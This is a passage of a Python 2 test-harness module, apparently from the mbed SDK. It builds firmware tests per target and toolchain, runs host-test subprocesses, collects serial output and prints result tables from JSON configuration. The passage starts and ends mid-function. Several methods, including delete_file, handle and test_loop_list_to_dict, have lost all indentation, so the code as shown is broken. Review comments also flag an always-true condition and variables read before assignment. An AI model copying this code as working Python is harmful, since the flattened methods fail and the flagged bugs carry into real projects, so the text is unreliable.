                handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)

                if handle_results is None:
                    continue

                for handle_result in handle_results:
                    if handle_result:
                        single_test_result, detailed_test_results = handle_result
                    else:
                        continue

                    # Append test results to global test summary
                    if single_test_result is not None:
                        self.test_summary.append(single_test_result)

                    # Add detailed test result to test summary structure
                    # NOTE(review): the guard below tests 'target' against a dict
                    # keyed by test ids -- it looks like it should test 'test_id';
                    # as written the condition is (accidentally) always true, so
                    # the inner init still runs. Confirm before changing.
                    if target not in self.test_summary_ext[target][toolchain]:
                        if test_id not in self.test_summary_ext[target][toolchain]:
                            self.test_summary_ext[target][toolchain][test_id] = []

                    append_test_result = detailed_test_results

                    # If waterfall and consolidate-waterfall options are enabled,
                    # only include the last test result in the report.
                    if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
                        append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}

                    self.test_summary_ext[target][toolchain][test_id].append(append_test_result)

            test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
            self.test_suite_properties_ext[target][toolchain] = test_suite_properties

        q.put(target + '_'.join(toolchains))
        return
    def execute(self):
        """ Top-level test-suite entry point: builds and runs tests for every
        target/toolchain pair in self.test_spec, optionally in parallel
        (one thread per target).

        Returns the tuple (test_summary, shuffle_random_seed,
        test_summary_ext, test_suite_properties_ext, build_report,
        build_properties).
        """
        clean = self.test_spec.get('clean', False)
        test_ids = self.test_spec.get('test_ids', [])
        q = Queue()

        # Generate seed for shuffle if seed is not provided in
        self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
        if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
            self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)

        if self.opts_parallel_test_exec:
            ###################################################################
            # Experimental, parallel test execution per singletest instance.
            ###################################################################
            execute_threads = []  # Threads used to build mbed SDL, libs, test cases and execute tests

            # Note: We are building here in parallel for each target separately!
            # So we are not building the same thing multiple times and compilers
            # in separate threads do not collide.
            # Inside execute_thread_slice() function function handle() will be called to
            # get information about available MUTs (per target).
            for target, toolchains in self.test_spec['targets'].iteritems():
                self.test_suite_properties_ext[target] = {}
                t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
                t.daemon = True
                t.start()
                execute_threads.append(t)

            for t in execute_threads:
                q.get()  # t.join() would block some threads because we should not wait in any order for thread end
        else:
            # Serialized (not parallel) test execution
            for target, toolchains in self.test_spec['targets'].iteritems():
                if target not in self.test_suite_properties_ext:
                    self.test_suite_properties_ext[target] = {}

                self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
                q.get()

        if self.db_logger:
            self.db_logger.reconnect();
            if self.db_logger.is_connected():
                self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
                self.db_logger.disconnect();

        return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
    def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
        """ Filter test ids down to those that should actually be built/run
        for the given target and toolchain, honouring the -n/-p/--peripherals
        style options and MUT peripheral availability.

        :param test_map_keys: candidate test ids (keys of TEST_MAP)
        :param test_ids: explicit test-id whitelist (empty means no filter)
        :param include_non_automated: include tests not flagged as automated
        :return: list of test ids that passed all filters
        """
        valid_test_map_keys = []

        for test_id in test_map_keys:
            test = TEST_MAP[test_id]
            if self.opts_test_by_names and test_id not in self.opts_test_by_names:
                continue

            if test_ids and test_id not in test_ids:
                continue

            if self.opts_test_only_peripheral and not test.peripherals:
                if self.opts_verbose_skipped_tests:
                    print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
                continue

            if self.opts_peripheral_by_names and test.peripherals and not len([i for i in test.peripherals if i in self.opts_peripheral_by_names]):
                # We will skip tests not forced with -p option
                if self.opts_verbose_skipped_tests:
                    print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
                continue

            if self.opts_test_only_common and test.peripherals:
                if self.opts_verbose_skipped_tests:
                    print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
                continue

            if not include_non_automated and not test.automated:
                if self.opts_verbose_skipped_tests:
                    print self.logger.log_line(self.logger.LogType.INFO, 'Non automated test skipped for target %s'% (target))
                continue

            if test.is_supported(target, toolchain):
                if test.peripherals is None and self.opts_only_build_tests:
                    # When users are using 'build only flag' and test do not have
                    # specified peripherals we can allow test building by default
                    pass
                elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names:
                    # If we force peripheral with option -p we expect test
                    # to pass even if peripheral is not in MUTs file.
                    pass
                elif not self.is_peripherals_available(target, test.peripherals):
                    if self.opts_verbose_skipped_tests:
                        if test.peripherals:
                            print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
                        else:
                            print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
                    continue

                # The test has made it through all the filters, so add it to the valid tests list
                valid_test_map_keys.append(test_id)

        return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
    def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
        """ Prints well-formed summary with results (SQL table like)
            table shows text x toolchain test result matrix

        :param test_summary: list of result tuples
                             (result, target, toolchain, test_id, description, ...)
        :param shuffle_seed: seed to display; falls back to
                             self.shuffle_random_seed when falsy
        :return: multi-line string, one table per target
        """
        RESULT_INDEX = 0
        TARGET_INDEX = 1
        TOOLCHAIN_INDEX = 2
        TEST_INDEX = 3
        DESC_INDEX = 4

        unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
        unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
        unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
        unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)

        result = "Test summary:\n"
        for target in unique_targets:
            result_dict = {}  # test : { toolchain : result }
            unique_target_toolchains = []
            for test in test_summary:
                if test[TARGET_INDEX] == target:
                    if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
                        unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
                    if test[TEST_INDEX] not in result_dict:
                        result_dict[test[TEST_INDEX]] = {}
                    result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]

            pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
            pt = PrettyTable(pt_cols)
            for col in pt_cols:
                pt.align[col] = "l"
            pt.padding_width = 1  # One space between column edges and contents (default)

            for test in unique_tests:
                if test in result_dict:
                    test_results = result_dict[test]
                    if test in unique_test_desc:
                        row = [target, test, unique_test_desc[test]]
                        for toolchain in unique_toolchains:
                            if toolchain in test_results:
                                row.append(test_results[toolchain])
                        pt.add_row(row)
            result += pt.get_string()
            # Shuffle-seed footer is (re)appended after each per-target table
            shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
                                                       shuffle_seed if shuffle_seed else self.shuffle_random_seed)
            result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
        return result
    def generate_test_summary(self, test_summary, shuffle_seed=None):
        """ Prints well-formed summary with results (SQL table like)
            table shows target x test results matrix across

        :param test_summary: list of result tuples; index 0 is the result code
        :param shuffle_seed: seed to display; falls back to
                             self.shuffle_random_seed when falsy
        :return: multi-line string with the result table and per-result counts
        """
        success_code = 0  # Success code that can be leter returned to
        # NOTE(review): 'success_code' above is never used in this method.
        result = "Test summary:\n"
        # Pretty table package is used to print results
        pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
                          "Elapsed Time (sec)", "Timeout (sec)", "Loops"])
        pt.align["Result"] = "l"  # Left align
        pt.align["Target"] = "l"  # Left align
        pt.align["Toolchain"] = "l"  # Left align
        pt.align["Test ID"] = "l"  # Left align
        pt.align["Test Description"] = "l"  # Left align
        pt.padding_width = 1  # One space between column edges and contents (default)

        # Counters for every known result code
        result_dict = {self.TEST_RESULT_OK : 0,
                       self.TEST_RESULT_FAIL : 0,
                       self.TEST_RESULT_ERROR : 0,
                       self.TEST_RESULT_UNDEF : 0,
                       self.TEST_RESULT_IOERR_COPY : 0,
                       self.TEST_RESULT_IOERR_DISK : 0,
                       self.TEST_RESULT_IOERR_SERIAL : 0,
                       self.TEST_RESULT_NO_IMAGE : 0,
                       self.TEST_RESULT_TIMEOUT : 0,
                       self.TEST_RESULT_MBED_ASSERT : 0,
                       self.TEST_RESULT_BUILD_FAILED : 0,
                       self.TEST_RESULT_NOT_SUPPORTED : 0
                       }

        for test in test_summary:
            if test[0] in result_dict:
                result_dict[test[0]] += 1
            pt.add_row(test)
        result += pt.get_string()
        result += "\n"

        # Print result count
        # (only result codes with a non-zero count are listed;
        #  .iteritems() on the comprehension result is Python-2-only)
        result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
        shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
                                                     shuffle_seed if shuffle_seed else self.shuffle_random_seed)
        result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
        return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
resutl_msg = e
result = False
return result, resutl_msg
    def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
        """ Test is being invoked for given MUT.

        Runs the test (possibly several loops), collecting one result per
        loop and a per-loop detailed record.

        :param mut: MUT description dict from the MUTs file (or None)
        :param data: decoded test spec with 'test_id', 'image', 'duration', 'mcu'
        :return: (summary result tuple, detailed_test_results dict) or None
                 when no MUT / disk / port is available
        """
        # Get test information, image and test timeout
        test_id = data['test_id']
        test = TEST_MAP[test_id]
        test_description = TEST_MAP[test_id].get_description()
        image = data["image"]
        duration = data.get("duration", 10)

        if mut is None:
            print "Error: No Mbed available: MUT[%s]" % data['mcu']
            return None

        mcu = mut['mcu']
        copy_method = mut.get('copy_method')  # Available board configuration selection e.g. core selection etc.

        if self.db_logger:
            self.db_logger.reconnect()

        selected_copy_method = self.opts_copy_method if copy_method is None else copy_method

        # Tests can be looped so test results must be stored for the same test
        test_all_result = []
        # Test results for one test ran few times
        detailed_test_results = {}  # { Loop_number: { results ... } }

        for test_index in range(test_loops):

            # If mbedls is available and we are auto detecting MUT info,
            # update MUT info (mounting may changed)
            if get_module_avail('mbed_lstools') and self.opts_auto_detect:
                platform_name_filter = [mcu]
                muts_list = {}
                found = False

                # Poll (up to ~3 minutes) until the board shows up in mbedls
                for i in range(0, 60):
                    print('Looking for %s with MBEDLS' % mcu)
                    muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)

                    if 1 not in muts_list:
                        sleep(3)
                    else:
                        found = True
                        break

                if not found:
                    print "Error: mbed not found with MBEDLS: %s" % data['mcu']
                    return None
                else:
                    mut = muts_list[1]

            disk = mut.get('disk')
            port = mut.get('port')

            if disk is None or port is None:
                return None

            target_by_mcu = TARGET_MAP[mut['mcu']]
            target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
            # Some extra stuff can be declared in MUTs structure
            reset_type = mut.get('reset_type')  # reboot.txt, reset.txt, shutdown.txt
            reset_tout = mut.get('reset_tout')  # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)

            # When the build and test system were separate, this was relative to a
            # base network folder base path: join(NETWORK_BASE_PATH, )
            image_path = image

            # Host test execution
            start_host_exec_time = time()

            single_test_result = self.TEST_RESULT_UNDEF  # single test run result
            _copy_method = selected_copy_method

            if not exists(image_path):
                # NOTE(review): in this branch 'single_testduration' and
                # 'single_timeout' are never assigned, yet they are read a few
                # lines below -- that would raise NameError. Confirm intended flow.
                single_test_result = self.TEST_RESULT_NO_IMAGE
                elapsed_time = 0
                single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
                print single_test_output
            else:
                # Host test execution
                start_host_exec_time = time()

                host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
                host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
                host_test_result = self.run_host_test(test.host_test,
                                                      image_path, disk, port, duration,
                                                      micro=target_name,
                                                      verbose=host_test_verbose,
                                                      reset=host_test_reset,
                                                      reset_tout=reset_tout,
                                                      copy_method=selected_copy_method,
                                                      program_cycle_s=target_by_mcu.program_cycle_s)
                single_test_result, single_test_output, single_testduration, single_timeout = host_test_result

            # Store test result
            test_all_result.append(single_test_result)
            total_elapsed_time = time() - start_host_exec_time  # Test time with copy (flashing) / reset
            elapsed_time = single_testduration  # TIme of single test case execution after reset

            detailed_test_results[test_index] = {
                'result' : single_test_result,
                'output' : single_test_output,
                'target_name' : target_name,
                'target_name_unique' : target_name_unique,
                'toolchain_name' : toolchain_name,
                'id' : test_id,
                'description' : test_description,
                'elapsed_time' : round(elapsed_time, 2),
                'duration' : single_timeout,
                'copy_method' : _copy_method,
            }

            print self.print_test_result(single_test_result, target_name_unique, toolchain_name,
                                         test_id, test_description, elapsed_time, single_timeout)

            # Update database entries for ongoing test
            if self.db_logger and self.db_logger.is_connected():
                test_type = 'SingleTest'
                self.db_logger.insert_test_entry(self.db_logger_build_id,
                                                 target_name,
                                                 toolchain_name,
                                                 test_type,
                                                 test_id,
                                                 single_test_result,
                                                 single_test_output,
                                                 elapsed_time,
                                                 single_timeout,
                                                 test_index)

            # If we perform waterfall test we test until we get OK and we stop testing
            if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
                break

        if self.db_logger:
            self.db_logger.disconnect()

        return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
                target_name_unique,
                toolchain_name,
                test_id,
                test_description,
                round(elapsed_time, 2),
                single_timeout,
                self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
    def run_host_test(self, name, image_path, disk, port, duration,
                      micro=None, reset=None, reset_tout=None,
                      verbose=False, copy_method=None, program_cycle_s=None):
        """ Function creates new process with host test configured with particular test case.
            Function also is pooling for serial port activity from process to catch all data
            printed by test runner and host test during test execution

        :param name: host test script name (run as '<name>.py' from HOST_TESTS)
        :param duration: test timeout in seconds (overall wait is 2x this,
                         and may be updated by the MUT's auto 'timeout' property)
        :return: tuple (result, output string, testcase_duration, duration)
        """
        def get_char_from_queue(obs):
            """ Get character from queue safe way
            """
            try:
                c = obs.queue.get(block=True, timeout=0.5)
            except Empty, _:
                c = None
            return c

        def filter_queue_char(c):
            """ Filters out non ASCII characters from serial port
            """
            if ord(c) not in range(128):
                c = ' '
            return c

        def get_test_result(output):
            """ Parse test 'output' data for the testcase result marker;
            defaults to TIMEOUT when no marker is found.
            """
            result = self.TEST_RESULT_TIMEOUT
            for line in "".join(output).splitlines():
                search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
                if search_result and len(search_result.groups()):
                    result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
                    break
            return result

        def get_auto_property_value(property_name, line):
            """ Scans auto detection line from MUT and returns scanned parameter 'property_name'
                Returns string
            """
            result = None
            if re.search("HOST: Property '%s'"% property_name, line) is not None:
                property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
                if property is not None and len(property.groups()) == 1:
                    result = property.groups()[0]
            return result

        # print "{%s} port:%s disk:%s" % (name, port, disk),
        cmd = ["python",
               '%s.py'% name,
               '-d', disk,
               '-f', '"%s"'% image_path,
               '-p', port,
               '-t', str(duration),
               '-C', str(program_cycle_s)]

        if get_module_avail('mbed_lstools') and self.opts_auto_detect:
            cmd += ['--auto']

        # Add extra parameters to host_test
        if copy_method is not None:
            cmd += ["-c", copy_method]
        if micro is not None:
            cmd += ["-m", micro]
        if reset is not None:
            cmd += ["-r", reset]
        if reset_tout is not None:
            cmd += ["-R", str(reset_tout)]

        if verbose:
            print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
            print "Test::Output::Start"

        proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
        obs = ProcessObserver(proc)
        update_once_flag = {}  # Stores flags checking if some auto-parameter was already set
        line = ''
        output = []
        start_time = time()
        # Pump characters from the host-test process until the test ends or
        # the (doubled) timeout expires
        while (time() - start_time) < (2 * duration):
            c = get_char_from_queue(obs)
            if c:
                if verbose:
                    sys.stdout.write(c)
                c = filter_queue_char(c)
                output.append(c)
                # Give the mbed under test a way to communicate the end of the test
                if c in ['\n', '\r']:

                    # Checking for auto-detection information from the test about MUT reset moment
                    if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
                        # We will update this marker only once to prevent multiple time resets
                        update_once_flag['reset_target'] = True
                        start_time = time()

                    # Checking for auto-detection information from the test about timeout
                    auto_timeout_val = get_auto_property_value('timeout', line)
                    if 'timeout' not in update_once_flag and auto_timeout_val is not None:
                        # We will update this marker only once to prevent multiple time resets
                        update_once_flag['timeout'] = True
                        duration = int(auto_timeout_val)

                    # Detect mbed assert:
                    if 'mbed assertation failed: ' in line:
                        output.append('{{mbed_assert}}')
                        break

                    # Check for test end
                    if '{end}' in line:
                        break
                    line = ''
                else:
                    line += c
        end_time = time()
        testcase_duration = end_time - start_time  # Test case duration from reset to {end}

        # Drain one last character that may still be queued
        c = get_char_from_queue(obs)

        if c:
            if verbose:
                sys.stdout.write(c)
            c = filter_queue_char(c)
            output.append(c)

        if verbose:
            print "Test::Output::Finish"
        # Stop test process
        obs.stop()

        result = get_test_result(output)
        return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
    """ Return the sorted list of unique values found at position 'index'
    in each test summary row.
    """
    return sorted({row[index] for row in test_summary})
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
    """ Build a dict mapping row[index_key] -> row[index_val] over all
    summary rows; the first occurrence of a key wins.
    """
    result = {}
    for row in test_summary:
        result.setdefault(row[index_key], row[index_val])
    return result
def show_json_file_format_error(json_spec_filename, line, column):
    """ Prints JSON broken content

    Shows up to the last 5 lines before the error line, then a caret
    marker under the offending column.

    :param json_spec_filename: path to the JSON file to display
    :param line: 1-based error line number
    :param column: 1-based error column number
    """
    with open(json_spec_filename) as data_file:
        line_no = 1
        for json_line in data_file:
            if line_no + 5 >= line:  # Print last few lines before error
                print 'Line %d:\t'%line_no + json_line,  # Prints line
                if line_no == line:
                    # Caret indicator aligned to the error column
                    print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
                    break
            line_no += 1
def json_format_error_defect_pos(json_error_msg):
    """ Gets first error line and column in JSON file format.
        Parsed from exception thrown by json.loads() string

    :return: [line, column]; either value is 0 when not found in the message
    """
    def _extract_number(keyword):
        # Look for e.g. 'line 12' / 'column 4' and return the integer part
        found = re.search(keyword + ' [0-9]+', json_error_msg)
        if found is not None:
            parts = found.group().split(' ')
            if len(parts) == 2:
                return int(parts[1])
        return 0

    return [_extract_number('line'), _extract_number('column')]
def get_json_data_from_file(json_spec_filename, verbose=False):
    """ Loads from file JSON formatted string to data structure

    Parse failures and missing files are reported on stdout and result in
    None; they never raise to the caller.

    :param json_spec_filename: path of the JSON file to load
    :param verbose: pretty-print the loaded structure when truthy
    :return: decoded data structure, or None on parse/open failure
    """
    result = None
    try:
        with open(json_spec_filename) as data_file:
            try:
                result = json.load(data_file)
            except ValueError as json_error_msg:
                result = None
                print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
                # We can print where error occurred inside JSON file if we can parse exception msg
                json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
                if json_format_defect_pos is not None:
                    line = json_format_defect_pos[0]
                    column = json_format_defect_pos[1]
                    print
                    show_json_file_format_error(json_spec_filename, line, column)
    except IOError as fileopen_error_msg:
        print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
        print
    if verbose and result:
        pp = pprint.PrettyPrinter(indent=4)
        pp.pprint(result)
    return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
    """ Render the MUTs configuration passed to the test script as a
    pretty-printed table string (for verbose output).

    :param json_data: dict of MUT index -> MUT property dict
    :param join_delim: delimiter used to join list-valued properties
    :param platform_filter: optional regex applied to each MUT's 'mcu'
    """
    # Column set is the union of properties over all MUT entries,
    # in first-seen order
    muts_info_cols = []
    for k in json_data:
        for mut_property in json_data[k]:
            if mut_property not in muts_info_cols:
                muts_info_cols.append(mut_property)

    # Prepare pretty table object to display all MUTs
    pt_cols = ["index"] + muts_info_cols
    pt = PrettyTable(pt_cols)
    for col in pt_cols:
        pt.align[col] = "l"

    # Add rows to pretty print object
    for k in json_data:
        mut_info = json_data[k]
        if platform_filter and 'mcu' in mut_info:
            if re.search(platform_filter, mut_info['mcu']) is None:
                continue
        row = [k]
        for col in muts_info_cols:
            cell_val = mut_info[col] if col in mut_info else None
            if type(cell_val) == ListType:
                cell_val = join_delim.join(cell_val)
            row.append(cell_val)
        pt.add_row(row)
    return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
    """ Prints test specification configuration passed to test script for verboseness

        @param json_data test specification ('targets' -> target -> toolchains)
        @param join_delim delimiter used when listing conflicting toolchains
        @return formatted table plus conflict report as a string;
                '*' marks a target/toolchain conflict, '#' a missing toolchain path
    """
    toolchains_info_cols = []
    # We need to check all toolchains for each device
    for k in json_data:
        # k should be 'targets'
        targets = json_data[k]
        for target in targets:
            toolchains = targets[target]
            for toolchain in toolchains:
                if toolchain not in toolchains_info_cols:
                    toolchains_info_cols.append(toolchain)
    # Prepare pretty table object to display test specification
    pt_cols = ["mcu"] + sorted(toolchains_info_cols)
    pt = PrettyTable(pt_cols)
    for col in pt_cols:
        pt.align[col] = "l"
    # { target : [conflicted toolchains] }
    toolchain_conflicts = {}
    toolchain_path_conflicts = []
    for k in json_data:
        # k should be 'targets'
        targets = json_data[k]
        for target in targets:
            target_supported_toolchains = get_target_supported_toolchains(target)
            if not target_supported_toolchains:
                target_supported_toolchains = []
            # Unknown targets are marked with a trailing '*'
            target_name = target if target in TARGET_MAP else "%s*"% target
            row = [target_name]
            toolchains = targets[target]
            for toolchain in sorted(toolchains_info_cols):
                # Check for conflicts: target vs toolchain
                conflict = False
                conflict_path = False
                if toolchain in toolchains:
                    if toolchain not in target_supported_toolchains:
                        conflict = True
                        if target not in toolchain_conflicts:
                            toolchain_conflicts[target] = []
                        toolchain_conflicts[target].append(toolchain)
                # Add marker inside table about target usage / conflict
                cell_val = 'Yes' if toolchain in toolchains else '-'
                if conflict:
                    cell_val += '*'
                # Check for conflicts: toolchain vs toolchain path
                if toolchain in TOOLCHAIN_PATHS:
                    toolchain_path = TOOLCHAIN_PATHS[toolchain]
                    if not os.path.isdir(toolchain_path):
                        conflict_path = True
                        if toolchain not in toolchain_path_conflicts:
                            toolchain_path_conflicts.append(toolchain)
                if conflict_path:
                    cell_val += '#'
                row.append(cell_val)
            pt.add_row(row)
    # generate result string
    result = pt.get_string()    # Test specification table
    if toolchain_conflicts or toolchain_path_conflicts:
        result += "\n"
        result += "Toolchain conflicts:\n"
        for target in toolchain_conflicts:
            if target not in TARGET_MAP:
                result += "\t* Target %s unknown\n"% (target)
            conflict_target_list = join_delim.join(toolchain_conflicts[target])
            sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
            result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)
        for toolchain in toolchain_path_conflicts:
            # Let's check toolchain configuration
            if toolchain in TOOLCHAIN_PATHS:
                toolchain_path = TOOLCHAIN_PATHS[toolchain]
                if not os.path.isdir(toolchain_path):
                    result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
    return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
    """ Generates table summary with all test cases and additional test cases
        information using pretty print functionality. Allows test suite user to
        see test cases

        @param cols optional list of test properties to show (default: id,
               automated, description, peripherals, host_test, duration)
        @param result_summary if True, append automation coverage tables
        @param join_delim delimiter used to join list-valued cells
        @param platform_filter optional regex applied to test ids
        @return formatted tables as a single string
    """
    # get all unique test ID prefixes
    unique_test_id = []
    for test in TESTS:
        split = test['id'].split('_')[:-1]
        test_id_prefix = '_'.join(split)
        if test_id_prefix not in unique_test_id:
            unique_test_id.append(test_id_prefix)
    unique_test_id.sort()
    # Per-prefix counters: automated tests vs all tests
    counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
    counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
    test_properties = ['id',
                       'automated',
                       'description',
                       'peripherals',
                       'host_test',
                       'duration'] if cols is None else cols
    # All tests status table print
    pt = PrettyTable(test_properties)
    for col in test_properties:
        pt.align[col] = "l"
    pt.align['duration'] = "r"
    counter_all = 0
    counter_automated = 0
    pt.padding_width = 1 # One space between column edges and contents (default)
    for test_id in sorted(TEST_MAP.keys()):
        if platform_filter is not None:
            # FIlter out platforms using regex
            if re.search(platform_filter, test_id) is None:
                continue
        row = []
        test = TEST_MAP[test_id]
        split = test_id.split('_')[:-1]
        test_id_prefix = '_'.join(split)
        for col in test_properties:
            col_value = test[col]
            if type(test[col]) == ListType:
                col_value = join_delim.join(test[col])
            elif test[col] == None:
                col_value = "-"
            row.append(col_value)
        if test['automated'] == True:
            counter_dict_test_id_types[test_id_prefix] += 1
            counter_automated += 1
        pt.add_row(row)
        # Update counters
        counter_all += 1
        counter_dict_test_id_types_all[test_id_prefix] += 1
    result = pt.get_string()
    result += "\n\n"
    if result_summary and not platform_filter:
        # Automation result summary
        test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
        pt = PrettyTable(test_id_cols)
        pt.align['automated'] = "r"
        pt.align['all'] = "r"
        pt.align['percent [%]'] = "r"
        percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
        str_progress = progress_bar(percent_progress, 75)
        pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
        result += "Automation coverage:\n"
        result += pt.get_string()
        result += "\n\n"
        # Test automation coverage table print
        test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
        pt = PrettyTable(test_id_cols)
        pt.align['id'] = "l"
        pt.align['automated'] = "r"
        pt.align['all'] = "r"
        pt.align['percent [%]'] = "r"
        for unique_id in unique_test_id:
            # print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
            percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
            str_progress = progress_bar(percent_progress, 75)
            row = [unique_id,
                   counter_dict_test_id_types[unique_id],
                   counter_dict_test_id_types_all[unique_id],
                   percent_progress,
                   "[" + str_progress + "]"]
            pt.add_row(row)
        result += "Test automation coverage:\n"
